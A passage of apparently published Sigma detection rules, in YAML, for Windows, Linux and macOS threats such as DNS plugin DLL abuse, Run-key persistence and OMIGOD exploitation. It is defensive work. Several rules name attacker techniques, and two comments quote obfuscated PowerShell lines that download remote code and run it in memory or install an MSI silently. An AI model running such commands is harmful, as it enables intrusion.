- '\MEGAsyncSetup32.exe' # Installers 32bit
- '\MEGAsyncSetup64.exe' # Installers 64bit
- '\MEGAupdater.exe'
DestinationHostname|endswith:
- 'mega.co.nz'
- 'mega.nz'
filter_main_googledrive:
Image|contains:
- 'C:\Program Files\Google\Drive File Stream\'
- 'C:\Program Files (x86)\Google\Drive File Stream\'
Image|endswith: 'GoogleDriveFS.exe'
DestinationHostname|endswith: 'drive.google.com'
filter_main_discord:
Image|contains: '\AppData\Local\Discord\'
Image|endswith: '\Discord.exe'
DestinationHostname|endswith:
- 'discord.com'
- 'cdn.discordapp.com'
filter_main_null:
Image: null
filter_main_empty:
Image: ''
# filter_optional_qlik:
# Image|endswith: '\Engine.exe' # Process from qlik.com app
condition: selection and not 1 of filter_main_*
falsepositives:
- One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.
- Ninite contacting githubusercontent.com
level: high
Convert to SIEM query
high
New Country
Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
view Sigma YAML
title: New Country
id: adf9f4d2-559e-4f5c-95be-c28dff0b1476
status: test
description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
- attack.stealth
- attack.t1078
- attack.persistence
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'newCountry'
condition: selection
falsepositives:
- We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
Convert to SIEM query
high
New DNS ServerLevelPluginDll Installed
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
view Sigma YAML
title: New DNS ServerLevelPluginDll Installed
id: e61e8a88-59a9-451c-874e-70fcc9740d67
related:
- id: cbe51394-cd93-4473-b555-edf0144952d9
type: derived
- id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
type: derived
status: test
description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
references:
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
author: Florian Roth (Nextron Systems)
date: 2017-05-08
modified: 2023-08-17
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.defense-impairment
- attack.t1574.001
- attack.t1112
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
view Sigma YAML
title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
related:
- id: e61e8a88-59a9-451c-874e-70fcc9740d67
type: derived
- id: cbe51394-cd93-4473-b555-edf0144952d9
type: derived
status: test
description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
references:
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
author: Florian Roth (Nextron Systems)
date: 2017-05-08
modified: 2023-02-05
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.defense-impairment
- attack.t1574.001
- attack.t1112
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\dnscmd.exe'
CommandLine|contains|all:
- '/config'
- '/serverlevelplugindll'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New File Association Using Exefile
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
view Sigma YAML
title: New File Association Using Exefile
id: 44a22d59-b175-4f13-8c16-cbaef5b581ff
status: test
description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
author: Andreas Hunkeler (@Karneades)
date: 2021-11-19
modified: 2023-08-17
tags:
- attack.stealth
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: 'Classes\.'
Details: 'exefile'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
view Sigma YAML
title: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e
related:
- id: cde0a575-7d3d-4a49-9817-b8004a7bf105
type: derived
status: test
description: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
references:
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
- https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#
author: frack113
date: 2023-02-26
modified: 2024-05-10
tags:
- attack.defense-impairment
- attack.t1686.003
logsource:
product: windows
service: firewall-as
detection:
selection:
EventID:
- 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10)
- 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)
- 2097
ApplicationPath|contains:
- ':\PerfLogs\'
- ':\Temp\'
- ':\Tmp\'
- ':\Users\Public\'
- ':\Windows\Tasks\'
- ':\Windows\Temp\'
- '\AppData\Local\Temp\'
filter_main_block:
Action: 2 # Block
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New Netsh Helper DLL Registered From A Suspicious Location
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
view Sigma YAML
title: New Netsh Helper DLL Registered From A Suspicious Location
id: e7b18879-676e-4a0e-ae18-27039185a8e7
related:
- id: 56321594-9087-49d9-bf10-524fe8479452
type: similar
- id: c90362e0-2df3-4e61-94fe-b37615814cb1
type: similar
status: test
description: |
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
- https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
- https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.007
logsource:
category: registry_set
product: windows
detection:
selection_target:
TargetObject|contains: '\SOFTWARE\Microsoft\NetSh'
selection_folders_1:
Details|contains:
- ':\Perflogs\'
- ':\Users\Public\'
- ':\Windows\Temp\'
- '\AppData\Local\Temp\'
- '\Temporary Internet'
selection_folders_2:
- Details|contains|all:
- ':\Users\'
- '\Favorites\'
- Details|contains|all:
- ':\Users\'
- '\Favourites\'
- Details|contains|all:
- ':\Users\'
- '\Contacts\'
- Details|contains|all:
- ':\Users\'
- '\Pictures\'
condition: selection_target and 1 of selection_folders_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New RDP Connection Initiated From Domain Controller
Detects an RDP connection originating from a domain controller.
view Sigma YAML
title: New RDP Connection Initiated From Domain Controller
id: fda34293-718e-4b36-b018-38caab0d1209
status: test
description: Detects an RDP connection originating from a domain controller.
references:
- Internal Research
author: Josh Nickels
date: 2024-05-10
tags:
- attack.lateral-movement
- attack.t1021
logsource:
product: windows
category: network_connection
detection:
selection_connection:
Initiated: 'True'
DestinationPort: 3389
selection_hosts:
Computer|expand: '%domain_controller_hostnames%'
filter_optional_defender_identity:
Image|endswith: '\Microsoft.Tri.Sensor.exe' # Microsoft Defender for Identity service makes port 3389 connections to hosts
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Legitimate administration activity
level: high
Convert to SIEM query
high
New RUN Key Pointing to Suspicious Folder
Detects suspicious new RUN key element pointing to an executable in a suspicious folder
view Sigma YAML
title: New RUN Key Pointing to Suspicious Folder
id: 02ee49e2-e294-4d0f-9278-f5b3212fc588
status: experimental
description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
references:
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2018-08-25
modified: 2025-10-06
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
logsource:
category: registry_set
product: windows
detection:
selection_target:
TargetObject|contains:
- '\Software\Microsoft\Windows\CurrentVersion\Run'
- '\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
- '\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
selection_suspicious_paths_1:
Details|contains:
- ':\Perflogs'
- :\ProgramData'
- ':\Windows\Temp'
- ':\Temp'
- '\AppData\Local\Temp'
- '\AppData\Roaming'
- ':\$Recycle.bin'
- ':\Users\Default'
- ':\Users\public'
- '%temp%'
- '%tmp%'
- '%Public%'
- '%AppData%'
selection_suspicious_paths_user_1:
Details|contains: ':\Users\'
selection_suspicious_paths_user_2:
Details|contains:
- '\Favorites'
- '\Favourites'
- '\Contacts'
- '\Music'
- '\Pictures'
- '\Documents'
- '\Photos'
filter_main_windows_update:
TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\'
Image|startswith: 'C:\Windows\SoftwareDistribution\Download\'
Details|contains|all:
- 'rundll32.exe '
- 'C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32'
Details|contains:
- '\AppData\Local\Temp\'
- 'C:\Windows\Temp\'
filter_optional_spotify:
Image|endswith:
- 'C:\Program Files\Spotify\Spotify.exe'
- 'C:\Program Files (x86)\Spotify\Spotify.exe'
- '\AppData\Roaming\Spotify\Spotify.exe'
TargetObject|endswith: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spotify'
Details|endswith: 'Spotify.exe --autostart --minimized'
condition: selection_target and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_* )) and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Software using weird folders for updates
level: high
Convert to SIEM query
high
New TimeProviders Registered With Uncommon DLL Name
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
Adversaries may abuse time providers to execute DLLs when the system boots.
The Windows Time service (W32Time) enables time synchronization across and within domains.
view Sigma YAML
title: New TimeProviders Registered With Uncommon DLL Name
id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85
status: test
description: |
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
Adversaries may abuse time providers to execute DLLs when the system boots.
The Windows Time service (W32Time) enables time synchronization across and within domains.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md
author: frack113
date: 2022-06-19
modified: 2024-03-26
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1547.003
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Services\W32Time\TimeProviders'
TargetObject|endswith: '\DllName'
filter_main_w32time:
Details:
- '%SystemRoot%\System32\vmictimeprovider.dll'
- '%systemroot%\system32\w32time.dll'
- 'C:\Windows\SYSTEM32\w32time.DLL'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
New User Created Via Net.EXE With Never Expire Option
Detects creation of local users via the net.exe command with the option "never expire"
view Sigma YAML
title: New User Created Via Net.EXE With Never Expire Option
id: b9f0e6f5-09b4-4358-bae4-08408705bd5c
related:
- id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
type: derived
status: test
description: Detects creation of local users via the net.exe command with the option "never expire"
references:
- https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2023-02-21
tags:
- attack.persistence
- attack.t1136.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\net.exe'
- '\net1.exe'
- OriginalFileName:
- 'net.exe'
- 'net1.exe'
selection_cli:
CommandLine|contains|all:
- 'user'
- 'add'
- 'expires:never'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Nginx Core Dump
Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
view Sigma YAML
title: Nginx Core Dump
id: 59ec40bb-322e-40ab-808d-84fa690d7e56
status: test
description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
references:
- https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps
- https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
author: Florian Roth (Nextron Systems)
date: 2021-05-31
modified: 2023-05-08
tags:
- attack.impact
- attack.t1499.004
logsource:
service: nginx
detection:
keywords:
- 'exited on signal 6 (core dumped)'
condition: keywords
falsepositives:
- Serious issues with a configuration or plugin
level: high
Convert to SIEM query
high
Ngrok Usage with Remote Desktop Service
Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
view Sigma YAML
title: Ngrok Usage with Remote Desktop Service
id: 64d51a51-32a6-49f0-9f3d-17e34d640272
status: test
description: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
references:
- https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
- https://ngrok.com/
author: Florian Roth (Nextron Systems)
date: 2022-04-29
tags:
- attack.command-and-control
- attack.t1090
logsource:
product: windows
service: terminalservices-localsessionmanager
detection:
selection:
EventID: 21
Address|contains: '16777216'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
potentially leading to arbitrary code execution and privilege escalation.
view Sigma YAML
title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
id: 10ac0730-c24e-4f4c-81f8-b13a1ac95a1d
status: experimental
description: |
Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
potentially leading to arbitrary code execution and privilege escalation.
references:
- https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh
author: Swachchhanda Shrawn Poudel (Nextron Systems)
date: 2025-10-02
modified: 2026-03-31
tags:
- attack.privilege-escalation
- attack.t1068
- cve.2025-32463
- detection.emerging-threats
logsource:
category: file_event
product: linux
detection:
selection:
TargetFilename|endswith: '/etc/nsswitch.conf'
filter_main_legitimate_path:
TargetFilename:
- '/etc/nsswitch.conf'
- '/usr/share/factory/etc/nsswitch.conf'
condition: selection and not 1 of filter_main_*
falsepositives:
- Backup locations
level: high
Convert to SIEM query
high
Non-privileged Usage of Reg or Powershell
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
view Sigma YAML
title: Non-privileged Usage of Reg or Powershell
id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d
status: test
description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
references:
- https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg
author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
date: 2020-10-05
modified: 2024-12-01
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
category: process_creation
product: windows
detection:
selection_cli:
- CommandLine|contains|all:
- 'reg '
- 'add'
- CommandLine|contains:
- 'powershell'
- 'set-itemproperty'
- ' sp '
- 'new-itemproperty'
selection_data:
IntegrityLevel:
- 'Medium'
- 'S-1-16-8192'
CommandLine|contains|all:
- 'ControlSet'
- 'Services'
CommandLine|contains:
- 'ImagePath'
- 'FailureCommand'
- 'ServiceDLL'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
NtdllPipe Like Activity Execution
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
view Sigma YAML
title: NtdllPipe Like Activity Execution
id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2
status: test
description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
references:
- https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
author: Florian Roth (Nextron Systems)
date: 2022-03-05
modified: 2023-03-07
tags:
- attack.defense-impairment
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'type %windir%\system32\ntdll.dll'
- 'type %systemroot%\system32\ntdll.dll'
- 'type c:\windows\system32\ntdll.dll'
- '\\ntdll.dll > \\\\.\\pipe\\'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
OMIGOD HTTP No Authentication RCE - CVE-2021-38647
Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.
Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).
Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
view Sigma YAML
title: OMIGOD HTTP No Authentication RCE - CVE-2021-38647
id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b
status: stable
description: |
Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.
Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).
Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://twitter.com/neu5ron/status/1438987292971053057?s=20
author: Nate Guagenti (neu5ron)
date: 2021-09-20
modified: 2025-11-03
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.lateral-movement
- attack.t1068
- attack.t1190
- attack.t1203
- attack.t1021.006
- attack.t1210
- detection.emerging-threats
- cve.2021-38647
logsource:
product: zeek
service: http
definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek
detection:
selection:
status_code: 200
uri: /wsman
method: POST
auth_header:
client_header_names|contains: 'AUTHORIZATION'
too_small_http_client_body:
request_body_len: 0
# winrm_ports:
# id.resp_p:
# - 5985
# - 5986
# - 1270
condition: selection and not auth_header and not too_small_http_client_body
# condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule
falsepositives:
- Exploits that were attempted but unsuccessful.
- Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.
level: high
Convert to SIEM query
high
OMIGOD SCX RunAsProvider ExecuteScript
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
view Sigma YAML
title: OMIGOD SCX RunAsProvider ExecuteScript
id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db
status: test
description: |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.t1068
- attack.t1190
- attack.t1203
logsource:
product: linux
category: process_creation
detection:
selection:
User: root
LogonId: 0
CurrentDirectory: '/var/opt/microsoft/scx/tmp'
CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'
condition: selection
falsepositives:
- Legitimate use of SCX RunAsProvider ExecuteScript.
level: high
Convert to SIEM query
high
OMIGOD SCX RunAsProvider ExecuteShellCommand
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
view Sigma YAML
title: OMIGOD SCX RunAsProvider ExecuteShellCommand
id: 21541900-27a9-4454-9c4c-3f0a4240344a
status: test
description: |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.execution
- attack.t1068
- attack.t1190
- attack.t1203
logsource:
product: linux
category: process_creation
detection:
selection:
User: root
LogonId: 0
CurrentDirectory: '/var/opt/microsoft/scx/tmp'
CommandLine|contains: '/bin/sh'
condition: selection
falsepositives:
- Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.
level: high
Convert to SIEM query
high
OSACompile Run-Only Execution
Detects potential suspicious run-only executions compiled using OSACompile
view Sigma YAML
title: OSACompile Run-Only Execution
id: b9d9b652-d8ed-4697-89a2-a1186ee680ac
status: test
description: Detects potential suspicious run-only executions compiled using OSACompile
references:
- https://redcanary.com/blog/applescript/
- https://ss64.com/osx/osacompile.html
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
tags:
- attack.t1059.002
- attack.execution
logsource:
product: macos
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'osacompile'
- ' -x '
- ' -e '
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
view Sigma YAML
title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
- attack.stealth
- attack.t1027.010
- attack.t1218.007
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
# Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- '-ComObject'
- 'InstallProduct('
- '.Insert('
- 'UILevel'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
view Sigma YAML
title: Obfuscated PowerShell OneLiner Execution
id: 44e24481-6202-4c62-9127-5a0ae8e3fe3d
status: test
description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
references:
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
- https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
author: '@Kostastsale, TheDFIRReport'
date: 2022-05-09
modified: 2025-04-16
tags:
- attack.execution
- attack.defense-impairment
- attack.t1059.001
- attack.t1685
logsource:
product: windows
category: process_creation
detection:
selection:
# Example: powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%%{(IRM $_)});&("".SubString.ToString()[67,72,64]-Join"")($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"
Image|endswith: '\powershell.exe'
CommandLine|contains|all:
- 'http://127.0.0.1'
- '%{(IRM $_)}'
- 'Invoke'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Octopus Scanner Malware
Detects Octopus Scanner Malware.
view Sigma YAML
title: Octopus Scanner Malware
id: 805c55d9-31e6-4846-9878-c34c75054fe9
status: test
description: Detects Octopus Scanner Malware.
references:
- https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
author: NVISO
date: 2020-06-09
modified: 2021-11-27
tags:
- attack.initial-access
- attack.t1195
- attack.t1195.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\AppData\Local\Microsoft\Cache134.dat'
- '\AppData\Local\Microsoft\ExplorerSync.db'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Odbcconf.EXE Suspicious DLL Location
Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
view Sigma YAML
title: Odbcconf.EXE Suspicious DLL Location
id: 6b65c28e-11f3-46cb-902a-68f2cafaf474
status: test
description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
references:
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
- https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
- https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
modified: 2023-05-26
tags:
- attack.stealth
- attack.t1218.008
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\odbcconf.exe'
- OriginalFileName: 'odbcconf.exe'
selection_cli:
# Note: Add more suspicious locations
CommandLine|contains:
- ':\PerfLogs\'
- ':\ProgramData\'
- ':\Temp\'
- ':\Users\Public\'
- ':\Windows\Registration\CRMLog'
- ':\Windows\System32\com\dmp\'
- ':\Windows\System32\FxsTmp\'
- ':\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\'
- ':\Windows\System32\spool\drivers\color\'
- ':\Windows\System32\spool\PRINTERS\'
- ':\Windows\System32\spool\SERVERS\'
- ':\Windows\System32\Tasks_Migrated\'
- ':\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\'
- ':\Windows\SysWOW64\com\dmp\'
